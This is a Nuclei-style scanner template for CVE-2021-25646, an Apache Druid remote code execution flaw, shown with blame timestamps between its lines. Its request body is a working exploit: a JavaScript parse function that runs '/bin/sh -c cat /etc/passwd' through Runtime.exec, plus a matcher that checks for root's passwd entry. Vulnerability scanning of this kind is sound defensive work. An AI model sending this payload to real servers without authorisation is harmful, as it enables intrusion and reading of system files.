2021-02-03 09:24:49 +00:00
id : CVE-2021-25646
info :
name : Apache Druid RCE
author : pikpikcu
2021-09-10 11:26:40 +00:00
severity : high
2021-02-03 09:24:49 +00:00
description : |
2021-08-19 14:44:46 +00:00
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
2022-04-22 10:38:41 +00:00
reference :
- https://paper.seebug.org/1476/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-25646
cwe-id : CWE-732
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,apache,rce,druid
2021-02-03 09:24:49 +00:00
requests :
- raw :
- |
2021-06-24 17:37:45 +00:00
POST /druid/indexer/v1/sampler HTTP/1.1
2021-02-03 09:24:49 +00:00
Host : {{Hostname}}
Content-Type : application/json
2021-06-30 14:58:41 +00:00
{
"type" : "index" ,
"spec" : {
"ioConfig" : {
"type" : "index" ,
"firehose" : {
"type" : "local" ,
"baseDir" : "/etc" ,
"filter" : "passwd"
}
},
"dataSchema" : {
"dataSource" : "odgjxrrrePz" ,
"parser" : {
"parseSpec" : {
"format" : "javascript" ,
"timestampSpec" : {
2021-06-30 15:01:15 +00:00
2021-06-30 14:58:41 +00:00
},
"dimensionsSpec" : {
2021-06-30 15:01:15 +00:00
2021-06-30 14:58:41 +00:00
},
"function" : "function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}" ,
"" : {
"enabled" : "true"
}
}
}
}
},
"samplerConfig" : {
"numRows" : 10
}
}
2021-02-03 16:12:03 +00:00
2021-02-03 09:24:49 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "application/json"
part : header
2021-06-30 14:58:41 +00:00
- type : word
words :
2021-02-03 09:24:49 +00:00
- "numRowsRead"
2021-02-03 16:12:03 +00:00
- "numRowsIndexed"
2021-02-03 09:24:49 +00:00
part : body
2021-03-10 14:03:49 +00:00
condition : and
2021-06-30 14:58:41 +00:00
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-06-30 14:58:41 +00:00
part : body